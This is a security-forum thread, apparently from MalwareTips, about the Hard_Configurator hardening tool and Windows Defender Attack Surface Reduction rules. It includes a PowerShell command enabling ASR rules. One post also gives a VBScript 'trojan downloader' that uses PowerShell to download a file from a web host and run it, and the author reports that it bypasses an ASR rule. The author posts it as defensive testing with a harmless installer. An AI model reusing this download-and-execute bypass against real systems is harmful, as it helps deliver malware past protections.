Hard_Configurator - Windows Hardening Configurator

Av Gurus

Av Gurus

Level 29
Verified
Honorary Member
Top Poster
Malware Hunter
Well-known
Sep 22, 2014
1,767
Andy Ful said:
Thanks. Defender used AttackSurfaceReductionRules_Id: D4F940AB-401B-4EFC-AADC-AD5F3C50688A, that is related to 'Block Office applications from creating child processes'.:)
Click to expand...

I set all of this options:

Clipboard12.jpgClipboard11.jpg
 
  • Like
Reactions: CodaPG, ZeroDay, Sunshine-boy and 1 other person
Andy Ful

Andy Ful

From Hard_Configurator Tools
Thread author
Verified
Honorary Member
Top Poster
Developer
Well-known
Dec 23, 2014
8,484
  • Like
Reactions: ZeroDay and Av Gurus
Andy Ful

Andy Ful

From Hard_Configurator Tools
Thread author
Verified
Honorary Member
Top Poster
Developer
Well-known
Dec 23, 2014
8,484
Andy Ful said:
It seems that the Attack Surface Reduction introduced in Windows 10 Fall Creators Update works also in Windows Home version. It can be configured when using PowerShell.
The bad news is that the rule 'Block Office applications from creating child processes' does not work with Microsoft Office 2007 and Open Office. It works well with Microsoft Office 2016.
So it is possible, that the below ASR features:
  • Block Office applications from creating child processes
  • Block Office applications from creating executable content
  • Block Office applications from injecting into other processes
  • Block Win32 imports from Macro code in Office
will work only with the office software still supported by Microsoft (MS Office 2010, 2013, 2016).
Unfortunately, I cannot test it for MS Office 2010 and MS Office 2013. I someone can then please let me know.
Click to expand...
Here is the link to docs.microsoft.com article:
Use Attack surface reduction rules to prevent malware infection
It follows from it, that ASR applies to:
  • Windows 10, version 1709 (and later)
  • Microsoft Office 365
  • Microsoft Office 2016
  • Microsoft Office 2013
  • Microsoft Office 2010
The bad thing is that also the ASR rule 'Impede JavaScript and VBScript to launch executables' seems not working outside Microsoft Office.
After setting the ASR rules:
Code: 
Set-MpPreference -AttackSurfaceReductionRules_Ids BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550,D4F940AB-401B-4EFC-AADC-AD5F3C50688A,3B576869-A4EC-4529-8536-B80A7769E899,75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84,D3E037E1-3EB8-44C8-A917-57927947596D,5BEB7EFE-FD9A-4556-801D-275E5FFC04CC,92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B -AttackSurfaceReductionRules_Actions Enabled,Enabled,Enabled,Enabled,Enabled,Enabled,Enabled
I can still run successfully eso.exe via the simple RunEso.vbs script:
Code: 
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run("c:\z\eso.exe")
WScript.Quit
 
  • Like
Reactions: AtlBo, ZeroDay, Sunshine-boy and 1 other person
Andy Ful

Andy Ful

From Hard_Configurator Tools
Thread author
Verified
Honorary Member
Top Poster
Developer
Well-known
Dec 23, 2014
8,484
Andy Ful said:
Here is the link to docs.microsoft.com article:
Use Attack surface reduction rules to prevent malware infection
It follows from it, that ASR applies to:
  • Windows 10, version 1709 (and later)
  • Microsoft Office 365
  • Microsoft Office 2016
  • Microsoft Office 2013
  • Microsoft Office 2010
The bad thing is that also the ASR rule 'Impede JavaScript and VBScript to launch executables' seems not working outside Microsoft Office.
After setting the ASR rules:
Code: 
Set-MpPreference -AttackSurfaceReductionRules_Ids BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550,D4F940AB-401B-4EFC-AADC-AD5F3C50688A,3B576869-A4EC-4529-8536-B80A7769E899,75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84,D3E037E1-3EB8-44C8-A917-57927947596D,5BEB7EFE-FD9A-4556-801D-275E5FFC04CC,92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B -AttackSurfaceReductionRules_Actions Enabled,Enabled,Enabled,Enabled,Enabled,Enabled,Enabled
I can still run successfully eso.exe via the simple RunEso.vbs script:
Code: 
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run("c:\z\eso.exe")
WScript.Quit
Click to expand...
In fact the ASR rule 'Impede JavaScript and VBScript to launch executables' has also another more appropriate description: 'Block JavaScript or VBScript from launching downloaded executable content'.
.
So, it cannot block the script from executing files that are already on the disk, but can block some script trojan downloaders. That feature works independently of Microsoft Office.
The bad thing is that I managed to bypass this ASR rule using the VBS script trojan downloader:
Code: 
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run("c:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -noprofile -command (New-Object System.Net.WebClient).DownloadFile('https://kcsoftwares.com/files/sumo_lite.exe','C:\Users\Public\Downloads\sumo_lite.exe')")
WScript.Sleep(10000)
WshShell.Run("C:\Users\Public\Downloads\sumo_lite.exe")
WScript.Quit
The downloaded/executed file is a harmless SUMO lite installer from the developer site. The analogical script without using PowerShell is blocked by ASR (no file is downloaded).
Poll - Who has already played with new W10 security features?
:rolleyes:(n)
 
Last edited:
  • Like
Reactions: AtlBo and ZeroDay
Andy Ful

Andy Ful

From Hard_Configurator Tools
Thread author
Verified
Honorary Member
Top Poster
Developer
Well-known
Dec 23, 2014
8,484
shmu26 said:
How can the average user of Hard Config keep notified about new versions?
I am on v. 3.1.0.0
Click to expand...
The problem is that Hard_Configurator do not look outside from the computer (no external connections). I was thinking about adding a <Check for updates button>. That option could check for the program new versions.:)
 
  • Like
Reactions: AtlBo, ZeroDay, Daniel Keller and 3 others
Andy Ful

Andy Ful

From Hard_Configurator Tools
Thread author
Verified
Honorary Member
Top Poster
Developer
Well-known
Dec 23, 2014
8,484
I am working now on Hard_Configurator extension, the tool to configure Windows Defender on Windows 10 FCU home versions (ASR rules + exclusions). It contains the rules used by @Av Gurus (16 rules + ASR rules), but cannot be used on Windows Pro, because PowerShell set-MpPreference cmdlet used to apply those settings can be overridden by existent Defender Group Policy rules. I have to solve this issue, because this tool is far more convenient than using gpedit.msc .
 
  • Like
Reactions: ForgottenSeer 85179, oldschool, AtlBo and 4 others
Andy Ful

Andy Ful

From Hard_Configurator Tools
Thread author
Verified
Honorary Member
Top Poster
Developer
Well-known
Dec 23, 2014
8,484
steel9 said:
Any plans to release the source code on GitHub? I mean for people worried about downloading unsigned applications xD
Click to expand...
Here is the link:
Hard_Configurator---old-versions/Hard_Configurator_3.1.0.0_sources.zip at master · AndyFul/Hard_Configurator---old-versions · GitHub
The Hard_Configurator folder must be copied to Windows folder!!!. One can compile the executable manually using AutoIt - only the file Hard_Configurator.au3 has to be compiled, the rest is added during the compilation process.
.
The code is not properly commented and is not optimized. It also uses some opensource functions made by the members of AutoIt Forums , (Ascend4nt, Erik Pilsits, FredAI, Melba23, trancexx, Valuater).
 
Last edited:
  • Like
Reactions: AtlBo, Daniel Keller, ZeroDay and 2 others
R

Reldel1

Level 2
Verified
Jun 12, 2017
50
I've been following your work on Hard_Configurator for some time and have been using SRP on Pro versions of Windows since Vista Days. My "mentor" with SRP was mechBgon, an early detailer of how to set up SRP. Never had any known malware since. While your work seems to be towards using H_C on Home versions, I was wondering if it is applicable for Pro versions as well? I was toying with trying it on a Pro version in place of my custom mechBgon installs. Would it work? Your thoughts.
 
  • Like
Reactions: AtlBo and Sunshine-boy
Andy Ful

Andy Ful

From Hard_Configurator Tools
Thread author
Verified
Honorary Member
Top Poster
Developer
Well-known
Dec 23, 2014
8,484
Reldel1 said:
I've been following your work on Hard_Configurator for some time and have been using SRP on Pro versions of Windows since Vista Days. My "mentor" with SRP was mechBgon, an early detailer of how to set up SRP. Never had any known malware since. While your work seems to be towards using H_C on Home versions, I was wondering if it is applicable for Pro versions as well? I was toying with trying it on a Pro version in place of my custom mechBgon installs. Would it work? Your thoughts.
Click to expand...
The SRP part of Hard_Configurator will work, but you have reset SRP:
  1. Use gpedit.msc to remove SRP from GPO.
  2. If you configured SRP when not using Group Policies (SSRP or reg tweaks), then simply press <Recommended SRP> button in Hard_Configurator.
The problem with other GPO settings is that they are refreshed in the Registry every day. This can overwrite the Hard_Configurator settings. Simply look at the Hard_Configurator settings after a day or two. If any setting will change its value, then it is the sign that you already activated this setting in GPO. If so, then it should be set to unconfigured state. If you will have any problem, just post here.:)
 
  • Like
Reactions: AtlBo, bribon77, Av Gurus and 1 other person
C

CoherentCrayon

Level 4
Verified
Jun 23, 2017
183
The x86 installer was detected as malware by multiple scanners. I submitted false positive reports to some of them, but according to Avast it was not a false positive.

"
Hello,

Thank you for reporting this.

Our virus specialists have confirmed that this detection is indeed correct due to lack of compliance with our clean software policy.

You can find further details in the following article: Avast Clean Guidelines.


With regards,

Avast Customer Care
"

I asked them why, but they haven't responded yet
 
  • Like
Reactions: AtlBo and Andy Ful

Similar threads

Andy Ful
    • +Reputation
    • Like
    • Applause
New Update Testing Windows Hybrid Hardening (new hardening application).
Replies
253
Views
29,431
Hard_Configurator Tools
South Park
South Park
Andy Ful
    • Like
    • +Reputation
    • Thanks
  • Sticky
Serious Discussion WHHLight - simplified application control for Windows Home and Pro.
Replies
318
Views
34,115
Hard_Configurator Tools
Andy Ful
Andy Ful
SpyNetGirl
    • Like
    • Applause
    • Thanks
Serious Discussion Why do you use obsolete security technologies such as SRP?
Replies
7
Views
1,127
General Security Discussions
Andy Ful
Andy Ful

About us

  • MalwareTips is a community-driven platform providing the latest information and resources on malware and cyber threats. Our team of experienced professionals and passionate volunteers work to keep the internet safe and secure. We provide accurate, up-to-date information and strive to build a strong and supportive community dedicated to cybersecurity.

Quick Navigation

Forum Rules Warning System Welcome Guide Two-factor Authentication

User Menu

Login

Follow us

Follow us on Facebook or Twitter to know first about the latest cybersecurity incidents and malware threats.

Top